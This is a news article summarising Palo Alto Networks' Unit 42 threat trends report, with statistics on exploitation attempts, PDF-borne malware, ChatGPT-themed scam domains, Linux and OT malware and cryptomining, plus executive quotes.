Palo Alto Networks has published Volume 2 of its Unit 42 Network Threat Trends Research Report. The report analysed global telemetry from Palo Alto Networks' Next-Generation Firewall (NGFW), Cortex Data Lake, Advanced URL Filtering and Advanced WildFire, identifying malware threat trends and providing analysis of the most significant and prevalent malware trends in the wild.
With the rate of vulnerability exploitation showing no sign of slowing down up from 147,000 attempts in 2021 to 228,000 in 2022 threat actors are exploiting both vulnerabilities that are already disclosed and ones that are not yet disclosed, including remote code execution (RCE), emails, compromised websites, newly registered domains (NRDs), ChatGPT/AI scams and cryptominer traffic, the report finds.
Steve Manley, Regional Vice President ANZ at Palo Alto Networks, comments, "Threat actors are constantly evolving their techniques, adopting multivector attacks that aim to bypass detection by employing various evasion tools and camouflage methods.
"They have become adept at exploiting vulnerabilities, and by the time security researchers and software vendors close the door on one vulnerability, cyber criminals have already found the next door to creak open. Organisations must, therefore, simultaneously guard against malware designed to exploit older vulnerabilities while proactively staying ahead of sophisticated new attacks."
Some of the key findings from the report include:
- Exploitation of vulnerabilities has increased: There was a 55% increase in vulnerability exploitation attempts, per customer, on average, compared to 2021.
- PDFs are the most popular file type for delivering malware: PDFs are the primary malicious email attachment type, being used 66% of the time to deliver malware via email.
- ChatGPT scams: Between November 2022-April 2023, Unit 42 saw a 910% increase in monthly registrations for domains, both benign and malicious, related to ChatGPT, in an attempt to mimic ChatGPT.
- Malware aimed at industries using OT technology is increasing: The average number of malware attacks experienced per organisation in the manufacturing, utilities and energy industry increased by 238% (between 2021 and 2022).
- Linux malware is on the rise, targeting cloud workload devices: An estimated 90% of public cloud instances run on Linux. Attackers seek new opportunities in cloud workloads and IoT devices running on Unix-like operating systems. The most common types of threats against Linux systems are: botnets (47%), coinminers (21%) and backdoors (11%).
- Cryptominer traffic is on the rise: Doubling in 2022, cryptomining continues to be an area of interest to threat actors, with 45% of sampled organisations having a signature trigger history that contains cryptominer-related traffic.
- Newly registered domains top target: To avoid detection, threat actors use newly registered domains (NRDs) for phishing, social engineering and spreading malware. Threat actors are more likely to target people visiting adult websites (20.2%) and financial services (13.9%) sites with NRDs.
- Evasive threats will continue to become increasingly complex: While attackers' continued use of old vulnerabilities shows that they will reuse code as long as it proves lucrative, there comes a point where creating newer, more complex attack techniques is necessary. When basic evasions became popular and security vendors started detecting them, attackers responded by moving toward more advanced techniques.
- Encrypted malware in traffic will keep increasing: 12.91% of malware traffic is already SSL encrypted. As threat actors adopt more tactics that mimic those of legitimate businesses, it's expected malware families using SSL-encrypted traffic to blend in with benign network traffic will continue growing.
Sean Duca, VP and Regional Chief Security Officer at Palo Alto Networks, says, "As millions of people use ChatGPT, it's unsurprising that we see ChatGPT-related scams, which have exploded over the past year, as cyber criminals take advantage of the hype around AI. But the trusty email PDF is still the most common way cybercriminals deliver malware.
"Cyber criminals, no doubt, are looking at how they can leverage it for their nefarious activities, but for now, simple social engineering will do just fine at tricking potential victims.
"Organisations must therefore take a holistic view of their security environment to provide comprehensive oversight of their network and ensure security best practices are followed at every level of the organisation."